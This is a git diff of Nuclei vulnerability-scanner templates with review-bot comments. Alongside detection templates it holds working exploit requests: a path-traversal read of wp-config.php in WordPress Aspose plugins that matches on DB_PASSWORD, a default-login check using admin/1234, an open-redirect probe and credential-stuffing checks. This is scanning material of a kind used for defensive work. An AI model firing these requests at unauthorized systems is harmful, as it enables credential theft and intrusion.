@@ -1,35 +0,0 @@ -id: aspose-pdf-file-download - -info: - name: WordPress Aspose PDF Exporter - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose PDF Exporter is vulnerable to local file inclusion. - reference: - - https://packetstormsecurity.com/files/131161 - - https://wordpress.org/plugins/aspose-pdf-exporter - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspose-words-exporter-file-download.yaml b/nuclei-templates/Other/aspose-words-exporter-file-download.yaml index f75904a727..f1026466a4 100644 --- a/nuclei-templates/Other/aspose-words-exporter-file-download.yaml +++ b/nuclei-templates/Other/aspose-words-exporter-file-download.yaml @@ -2,7 +2,7 @@ id: aspose-words-exporter-file-download info: name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download - author: 0x_Akoko + author: imhunterand severity: high tags: wordpress,wp-plugin,lfi,wp reference: https://wpscan.com/vulnerability/7869 diff --git a/nuclei-templates/Other/aspose-words-file-download-571.yaml b/nuclei-templates/Other/aspose-words-file-download-571.yaml new file mode 100644 index 0000000000..d881e787a8 --- /dev/null +++ b/nuclei-templates/Other/aspose-words-file-download-571.yaml 
@@ -0,0 +1,25 @@ +id: aspose-words-file-download +info: + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. + reference: + - https://wpscan.com/vulnerability/7869 + - https://wordpress.org/plugins/aspose-doc-exporter + tags: wordpress,wp-plugin,lfi,aspose +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-words-file-download-572.yaml b/nuclei-templates/Other/aspose-words-file-download-572.yaml deleted file mode 100644 index 78a79b554e..0000000000 --- a/nuclei-templates/Other/aspose-words-file-download-572.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aspose-words-file-download - -info: - name: WordPress Aspose Words Exporter <2.0 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose Words Exporter prior to version 2.0 is vulnerable to local file inclusion. - reference: - - https://wpscan.com/vulnerability/7869 - - https://wordpress.org/plugins/aspose-doc-exporter - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 
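Review bot: aspose-words-file-download-571.yaml replaces the deleted aspose-words-file-download-572.yaml with an older revision that drops the `classification:` block (`cvss-metrics`, `cvss-score: 7.5`, `cwe-id: CWE-22`); the request, matchers and references are otherwise the same, so the deletion loses metadata without changing the check. It also looks like a duplicate of aspose-words-exporter-file-download.yaml, whose visible name (`Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download`) and wpscan reference 7869 match this template; that file's request path is outside its hunk, so confirm before retiring one of the two. At minimum, carry the 572 classification over into the new file.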
diff --git a/nuclei-templates/Other/aspx-debug-mode-577.yaml b/nuclei-templates/Other/aspx-debug-mode-577.yaml new file mode 100644 index 0000000000..1879d55864 --- /dev/null +++ b/nuclei-templates/Other/aspx-debug-mode-577.yaml @@ -0,0 +1,33 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + tags: debug + +requests: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'OK' + part: body + - type: word + words: + - 'Content-Length: 2' + part: header diff --git a/nuclei-templates/Other/aspx-debug-mode-578.yaml b/nuclei-templates/Other/aspx-debug-mode-578.yaml deleted file mode 100644 index 50a5ae5cbd..0000000000 --- a/nuclei-templates/Other/aspx-debug-mode-578.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aspx-debug-mode - -info: - name: ASP.NET Debugging Enabled - author: dhiyaneshDk - severity: info - reference: - - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled - tags: debug - -requests: - - raw: - - | - DEBUG /Foobar-debug.aspx HTTP/1.1 - Host: {{Hostname}} - Command: stop-debug - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Length: 2 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'OK' - part: body - - type: word - words: - - 'Content-Length: 2' - part: header diff --git a/nuclei-templates/Other/astra-sites.yaml b/nuclei-templates/Other/astra-sites.yaml index cc711b197f..116e0c420a 100644 --- a/nuclei-templates/Other/astra-sites.yaml 
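Review bot: The raw request in the new aspx-debug-mode-577.yaml declares `Content-Length: 2` but carries no body after the blank line, so if the engine forwards the header as written the server waits for two bytes that never arrive; the deleted 578 copy had the same shape, but the rewrite is the moment to confirm whether the header is intentional and, if not, drop it or add the two-byte body. The hard-coded `User-Agent` and `Accept-Language` headers added here override whatever the scan configures and play no part in the match, which is status 200 plus body `OK` plus `Content-Length: 2` in the response header. `reference` is also a scalar here while the deleted copy and the rest of this commit use a list.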
+++ b/nuclei-templates/Other/astra-sites.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/astra-widgets.yaml b/nuclei-templates/Other/astra-widgets.yaml index f8cd0a8b15..dc4703ef8d 100644 --- a/nuclei-templates/Other/astra-widgets.yaml +++ b/nuclei-templates/Other/astra-widgets.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/asus-aicloud-panel.yaml b/nuclei-templates/Other/asus-aicloud-panel.yaml index baefc1809e..035b14eb56 100644 --- a/nuclei-templates/Other/asus-aicloud-panel.yaml +++ b/nuclei-templates/Other/asus-aicloud-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: - verified: "true" max-request: 1 shodan-query: title:"AiCloud" + verified: "true" tags: panel,asus,aicloud,detect http: @@ -30,5 +30,4 @@ http: - 200 - 401 condition: or - -# digest: 4a0a0047304502206b920912bfdce6a5b01db3e340f9957c69a5421e041f9881b36ab8d75b6b7e14022100a5f6ce8d57c2d258e0b9d5045b6d62192cdef39b5a77e4d37cc8556b84006f20:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b633553cbf3cb807efd84cb1fe68e4e2290ce6d99d22b72d8a5d479da998ab2602202fb7f481cf9d2cd5f9d23ba28a929aec8e9f27efc893350ed71167bd8c75688e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/asus-router-panel.yaml b/nuclei-templates/Other/asus-router-panel.yaml index cb715acc21..50dfe3aca4 100644 --- a/nuclei-templates/Other/asus-router-panel.yaml +++ b/nuclei-templates/Other/asus-router-panel.yaml 
@@ -7,14 +7,14 @@ info: description: Asus router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' + verified: true tags: panel,asus,router,iot -requests: +http: - method: GET path: - "{{BaseURL}}/Main_Login.asp" @@ -30,5 +30,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/05 +# digest: 4a0a00473045022100f6b434b60dc9836ffb8ad6dc737740ac3dae892a6c1b2011c677ad36d518971602203e69a5a5f15b7f8db34d6885f7e6855faa46cac581126fdb7cbb92c9827145b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml b/nuclei-templates/Other/asustor-adm-sqli.yaml similarity index 100% rename from nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml rename to nuclei-templates/Other/asustor-adm-sqli.yaml diff --git a/nuclei-templates/Other/asyncrat-c2.yaml b/nuclei-templates/Other/asyncrat-c2.yaml index bb63fea9dc..1a74e66eb5 100644 --- a/nuclei-templates/Other/asyncrat-c2.yaml +++ b/nuclei-templates/Other/asyncrat-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: ssl:"AsyncRAT Server" censys-query: services.tls.certificates.leaf_data.issuer.common_name:AsyncRat - tags: c2,ir,osint,malware + tags: c2,ssl,tls,ir,osint,malware,asyncrat ssl: - address: "{{Host}}:{{Port}}" matchers: @@ -26,5 +26,4 @@ ssl: - type: json json: - " .issuer_cn" - -# digest: 4a0a004730450220262e30eae7a22898fce4027f0cb799b8a221f72dc8098b424b852dfff2e95ebc022100fad62d4f31cf375bde4762fde5912d964e68e604cb0f1beb61dbb71f5874bed3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c59847c783270837ebb9b2cebee01b561be5ea05cd2616a58b88b06a29504c080220279339a3be2b66697a10fbe80acc53ebafc888777a7f1975fc7194b72d78911e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/Other/atechmedia-codebase-login-check.yaml b/nuclei-templates/Other/atechmedia-codebase-login-check.yaml index dca8671210..1783147d48 100644 --- a/nuclei-templates/Other/atechmedia-codebase-login-check.yaml +++ b/nuclei-templates/Other/atechmedia-codebase-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,atechmedia,codebase,creds-stuffing + tags: cloud,creds-stuffing,login-check,atechmedia,codebase self-contained: true @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502203211e4c4a8ee586c921ef85318df427da89889286ef172f41e919af244cf9f29022100fdcdaafd216a411845f5a049a99435d301f1023257f461d33f360641023c2451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6260850c8884a11dfab10badc50eca9b785dc2db129f54b76e9605d49a30ebd0221009c6a4578217807fba1884a34be4e6e00b9d627a71fb62fd024876cee11219fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ATHD-DVR-fileRead.yaml b/nuclei-templates/Other/athd-dvr-fileread.yaml similarity index 100% rename from nuclei-templates/Other/ATHD-DVR-fileRead.yaml rename to nuclei-templates/Other/athd-dvr-fileread.yaml diff --git a/nuclei-templates/Other/atlantis-detect.yaml b/nuclei-templates/Other/atlantis-detect.yaml index a80ac7315e..b8b0ab3df1 100644 --- a/nuclei-templates/Other/atlantis-detect.yaml +++ b/nuclei-templates/Other/atlantis-detect.yaml 
@@ -9,14 +9,17 @@ info: - https://github.com/runatlantis/atlantis classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:runatlantis:atlantis:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: atlantis shodan-query: http.favicon.hash:-1706783005 - tags: panel,atlantis + vendor: runatlantis + verified: true + tags: panel,atlantis,runatlantis -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -33,5 +36,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/09 +# digest: 4a0a00473045022100f82fc01481176024c052e1e298f7cffd05aaf1868b51e2cf87b6e0d0b6799cba02200bb85fcae7ccbc15a106bdb1d32dfe806412d78574a92c3565b72a0eebf329ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-api-token.yaml b/nuclei-templates/Other/atlassian-api-token.yaml index 7b9af43161..fcb73fa4c6 100644 --- a/nuclei-templates/Other/atlassian-api-token.yaml +++ b/nuclei-templates/Other/atlassian-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml metadata: verified: true - tags: atlassian,file,token,api + tags: file,keys,atlassian,token,api file: - extensions: @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 490a0046304402205433d3902cf7e3c7635bf23232f379b1aef00a5392fd97cd14771a114acd0a3902204babacddd38ce1156ad037e03c2f52b998acc6da7448013a7d6489edafd42644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/Other/atlassian-bamboo-build.yaml b/nuclei-templates/Other/atlassian-bamboo-build.yaml index 015d5b8cca..6dd8512ad1 100644 --- a/nuclei-templates/Other/atlassian-bamboo-build.yaml +++ b/nuclei-templates/Other/atlassian-bamboo-build.yaml @@ -6,10 +6,11 @@ info: severity: unknown metadata: verified: true + max-request: 1 shodan-query: title:"Build Dashboard - Atlassian Bamboo" tags: misconfig,atlassian,bamboo -requests: +http: - method: GET path: - "{{BaseURL}}/allPlans.action" @@ -31,3 +32,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502200efd94247b76255574cc32b50365f1821d561bf7b226cc1430091fcf6ba61770022100cbc16a88c5a70b05497ec2551205be3cf455ed23a7cf4d0a083226d1c34e8857:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/atlassian-bamboo-panel.yaml b/nuclei-templates/Other/atlassian-bamboo-panel.yaml index 3faf916ca1..f09d8afd9b 100644 --- a/nuclei-templates/Other/atlassian-bamboo-panel.yaml +++ b/nuclei-templates/Other/atlassian-bamboo-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.atlassian.com/software/bamboo metadata: - verified: true max-request: 1 shodan-query: http.title:"Bamboo" + verified: true tags: panel,bamboo,login,detect http: @@ -41,4 +41,4 @@ http: regex: - 'version\s+([0-9A-Za-z\s\.]+)\s+-' - 'pvpVersion = "([a-z0-9.]+)";' -# digest: 4b0a00483046022100ece84998eb9793b9e2c73bac643c4cf195724becb28ccb35d37fad0066c4967b022100b75da45856fa8d90182181299882a1339a8ba78ccc81f4964c4754a16e3acf6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a964e7e553f1326fa41008524ff247a00a22f33e9f1dcebcafe996e8997d24d602210083a8c103431cac6bca37b6b353658618f0e3b3a61cf2996a975fa19b6070c6d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml b/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml index 2b37258969..81ffbcf92d 100644 
--- a/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml +++ b/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml @@ -4,12 +4,14 @@ info: name: Atlassian Bamboo Setup Wizard author: pussycat0x severity: info + description: Atlassian Bamboo is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true + max-request: 1 shodan-query: title:"Bamboo setup wizard" tags: misconfig,atlassian,bamboo,setup,installer -requests: +http: - method: GET path: - "{{BaseURL}}/setup/setupLicense.action" @@ -30,3 +32,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-crowd-panel-581.yaml b/nuclei-templates/Other/atlassian-crowd-panel-581.yaml new file mode 100644 index 0000000000..b7819bc20a --- /dev/null +++ b/nuclei-templates/Other/atlassian-crowd-panel-581.yaml @@ -0,0 +1,18 @@ +id: atlassian-crowd-panel + +info: + name: Atlassian Crowd panel detect + author: organiccrap + severity: info + tags: panel,atlassian + +requests: + - method: GET + path: + - '{{BaseURL}}/crowd/console/login.action' + + matchers: + - type: word + words: + - Atlassian Crowd - Login + part: body diff --git a/nuclei-templates/Other/atlassian-crowd-panel.yaml b/nuclei-templates/Other/atlassian-crowd-panel.yaml deleted file mode 100644 index 4fd18bcda4..0000000000 --- a/nuclei-templates/Other/atlassian-crowd-panel.yaml +++ /dev/null 
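Review bot: The `description` added to atlassian-bamboo-setup-wizard.yaml reads awkwardly ("is susceptible to the Installation page exposure due to misconfiguration"). Suggested wording: `description: The Atlassian Bamboo setup wizard is reachable, exposing the installation page due to misconfiguration.` The request and matchers sit outside this hunk.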
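Review bot: The new atlassian-crowd-panel-581.yaml carries no `description`, `reference` or `metadata`, while the panel templates updated elsewhere in this commit all have `reference:`, `metadata.max-request` and a `shodan-query`. Suggested additions under `info:`: `description: Atlassian Crowd login panel was detected.`, a `reference:` list pointing at the vendor product page, and `metadata:` with `max-request: 1`. `matchers-condition: and` guards a single matcher here and can be dropped; the hunk is the whole file.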
@@ -1,19 +0,0 @@ -id: atlassian-crowd-panel - -info: - name: Atlassian Crowd panel detect - author: organiccrap - severity: info - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers: - - type: word - words: - - Atlassian Crowd - Login - part: body diff --git a/nuclei-templates/Other/atlassian-login-check.yaml b/nuclei-templates/Other/atlassian-login-check.yaml index d29e8ffc78..68d7d729cd 100644 --- a/nuclei-templates/Other/atlassian-login-check.yaml +++ b/nuclei-templates/Other/atlassian-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,atlassian,creds-stuffing + tags: cloud,creds-stuffing,login-check,atlassian self-contained: true @@ -41,5 +41,4 @@ http: - type: status status: - 403 - -# digest: 490a0046304402206f50cd5e1d38f5e8d581cf0327ea54c3e6d99e90b496555be87136c6358ea65702201b6d5dd42c50dd91d9ae55ed828d0029fed2053fc6a2d30fe99cc8a32eb591e5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210083c73505e66eaf278170bb782317370fa97a3e1415caebb9641f7632b44303c802207bda547ec71a5e97a812ea525a5f3f0217bd34d60c77ef3d1782c8da03c57192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atom-sync-remote.yaml b/nuclei-templates/Other/atom-sync-remote.yaml index ed32916b4f..b8f4e67bd4 100644 --- a/nuclei-templates/Other/atom-sync-remote.yaml +++ b/nuclei-templates/Other/atom-sync-remote.yaml @@ -8,9 +8,10 @@ info: It discloses username and password created by remote-sync for Atom, contains FTP and/or SCP/SFTP/SSH server details and credentials metadata: verified: true + max-request: 1 tags: atom,exposure,config,files -requests: +http: - method: GET path: - "{{BaseURL}}/.remote-sync.json" 
@@ -39,3 +40,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402203c2cdc6eb2e5ba53413df0c22072777c74efcfb1df85e2c762933675ab9fa19d0220297af89ee6df02e54dd45dac6fd1e7faa45e985077252ebac613860a3c7a2faf:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml index 27dc936559..3dbd07b8b7 100644 --- a/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml +++ b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. - reference: https://cxsecurity.com/issue/WLB-2020030185 + reference: + - https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect requests: diff --git a/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml b/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml index b4071f7af7..d3a1f11f31 100644 --- a/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml +++ b/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml @@ -1,17 +1,14 @@ id: attitude-wp-theme-open-redirect - info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko reference: https://cxsecurity.com/issue/WLB-2020030185 severity: low tags: wp,redirect - requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" - matchers: - type: regex regex: diff --git a/nuclei-templates/Other/audiobookshelf-panel.yaml b/nuclei-templates/Other/audiobookshelf-panel.yaml index 1e98a02333..47a1227c37 100644 --- a/nuclei-templates/Other/audiobookshelf-panel.yaml +++ b/nuclei-templates/Other/audiobookshelf-panel.yaml 
@@ -7,9 +7,9 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: - verified: true max-request: 2 shodan-query: title:"Audiobookshelf" + verified: true tags: panel,audiobookshelf,detect http: @@ -34,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205c2b8c821545d360dea78b15558d6e1976d17b27b05796ced518f11dc6180363022060d87a8c9d7338a79e7d0cd96f19ce47412e803f78353038942a590db85bcdcd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005d33f7b55e2318631d9a35582243793911cf44caa7570de0655afcb96b7c087022100d6627477aed96ce42ff3b817821d0634bc007f7e63aacb212eb9fefb95ec0367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/audiocodes-default-login.yaml b/nuclei-templates/Other/audiocodes-default-login.yaml index b55bd57f3d..e6698c76ee 100644 --- a/nuclei-templates/Other/audiocodes-default-login.yaml +++ b/nuclei-templates/Other/audiocodes-default-login.yaml @@ -9,9 +9,11 @@ info: - https://wiki.freepbx.org/display/FPG/Supported+Devices-Audio+Codes#:~:text=Reset%20to%20Factory%20Defaults,-Press%20the%20Menu&text=Then%2C%20enter%20the%20Admin%20password,is%20%221234%22%20by%20default classification: cwe-id: CWE-798 + metadata: + max-request: 1 tags: iot,audiocodes,default-login -requests: +http: - raw: - | POST /login.cgi HTTP/1.1 @@ -26,8 +28,8 @@ requests: - admin password: - "1234" - unsafe: true + matchers-condition: and matchers: - type: word @@ -44,4 +46,4 @@ requests: status: - 200 -# Enhanced by md on 2023/01/06 +# digest: 490a00463044022054134961f9dae8e28f1a3ab15e2f4d54ab53cc99d2cd6f0ad84d409de02bd54102207d3ddda420249b278edca1d72b1ba7b373e5bb4b8df47724af9df2396caa2660:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/audiocodes-detect.yaml b/nuclei-templates/Other/audiocodes-detect.yaml index 7504ef3a9d..31fd950bd3 100644 --- a/nuclei-templates/Other/audiocodes-detect.yaml +++ b/nuclei-templates/Other/audiocodes-detect.yaml 
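Review bot: Removing `unsafe: true` from the raw `POST /login.cgi` request in audiocodes-default-login.yaml changes how the request is sent: with the flag the raw bytes go out as written, without it the request is re-parsed and normalized by the standard HTTP client before sending. Nothing in the commit says the device no longer needs the raw framing, so the default-login check may silently stop matching on hosts it matched before; either restore `unsafe: true` or record in `description` that the template was re-verified against a live device after the change. The raw request body and the word matcher sit outside the hunk.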
@@ -7,21 +7,20 @@ info: description: AudioCodes login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.html:"Audiocodes" + verified: true tags: panel,audiocodes -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: - - type: word part: body words: @@ -32,5 +31,4 @@ requests: - type: status status: - 203 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100b29ce2ad2ced6c154ef7287f7e2bf74247ed12c973fa8700cc3aa184f51f822702204420ed6a24a68b3a48b62a0eae4318e0333e1706241a6566136ab8166318a615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aura_utility_services.yaml b/nuclei-templates/Other/aura_utility_services.yaml new file mode 100644 index 0000000000..44c053f819 --- /dev/null +++ b/nuclei-templates/Other/aura_utility_services.yaml @@ -0,0 +1,20 @@ +id: aura_utility_services +info: + name: aura_utility_services + author: cn-kali-team + tags: detect,tech,aura_utility_services + severity: info + metadata: + product: aura_utility_services + shodan-query: + - html:"avaya aura" + vendor: avaya + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - avaya aura diff --git a/nuclei-templates/Other/auth-js.yaml b/nuclei-templates/Other/auth-js.yaml index 38ef687687..48efa55165 100644 --- a/nuclei-templates/Other/auth-js.yaml +++ b/nuclei-templates/Other/auth-js.yaml @@ -1,10 +1,8 @@ id: auth-js - info: name: auth.js author: geeknik severity: high - requests: - method: GET path: @@ -15,7 +13,6 @@ requests: - "{{BaseURL}}/src/auth.js" - "{{BaseURL}}/src/api/auth.js" - "{{BaseURL}}/web/api/auth.js" - matchers-condition: and matchers: - type: status diff --git a/nuclei-templates/Other/auth-json.yaml b/nuclei-templates/Other/auth-json.yaml index e9d1fdbd80..9813d621ef 100644 
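Review bot: The only matcher in the new aura_utility_services.yaml is a case-sensitive `words: - avaya aura` on the body, but the lowercase string comes straight from the Shodan `html:"avaya aura"` query, which is case-insensitive; if the page renders the product name as `Avaya Aura` the template never fires. Add `case-insensitive: true` to the word matcher, and consider a `status: 200` matcher with `matchers-condition: and` as the other detect templates in this commit use. `info.name` is just the id, `tags` precedes `severity`, and the file and id use underscores where the rest of the collection uses hyphens; a readable name such as `Avaya Aura Utility Services - Detect` would help.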
--- a/nuclei-templates/Other/auth-json.yaml +++ b/nuclei-templates/Other/auth-json.yaml @@ -4,6 +4,7 @@ info: name: Auth.json File - Disclosure author: DhiyaneshDk severity: high + description: auth.json file is exposed. metadata: verified: true max-request: 1 @@ -39,5 +40,4 @@ http: - '"consumer-key":' - '"consumer-secret":' condition: and - -# digest: 4a0a00473045022055f17fa3879ce3d236868b90db82221dbf48c1b9124dc9f97232b37bccdf57c40221009d503d8c3ecf87706e71ea7429852f3359f3a53cb35ffe0a866e922f1bf5eae3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022041c4bb864ef31efd635294afb0d84a82586c421227bf8a3d42feed005d09501402204d7a803e2d35b37558df4a4c3466907bf3acd76c3a035c10ad04335b48d4b394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/authelia-panel.yaml b/nuclei-templates/Other/authelia-panel.yaml index 2ca8657997..fbdb95d748 100644 --- a/nuclei-templates/Other/authelia-panel.yaml +++ b/nuclei-templates/Other/authelia-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/authelia/authelia - https://www.authelia.com/ metadata: - verified: true max-request: 1 shodan-query: title:"Login - Authelia" + verified: true tags: login,panel,authelia http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220490a5021967e030ff89ae16d4641c71e7eed70d1dd4ff6cd0f0194c789109b09022059bfbb46ae3a213be944bd8038a53d6fc66cd14351190788fbc8a035e9e6fbed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008fd87b39284e84d585bb9f507cbcbbe83b8d7e6cdd73eb30ac8401c192cd19a2022061c03f9d86a08c9af5bb06582714b9d38aed4e8e104af2045c44c95392e0e73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/auto-usb-install.yaml b/nuclei-templates/Other/auto-usb-install.yaml index 0f971fe501..1a5ac4e0d4 100644 --- a/nuclei-templates/Other/auto-usb-install.yaml +++ b/nuclei-templates/Other/auto-usb-install.yaml 
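Review bot: The `description` added to auth-json.yaml (`auth.json file is exposed.`) says nothing a reader cannot get from the name. The matcher in this file keys on `"consumer-key":` and `"consumer-secret":`, so the description should say what is at stake, e.g. `description: An auth.json file containing consumer-key/consumer-secret credentials is publicly readable.` The request and remaining matchers are outside the hunk.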
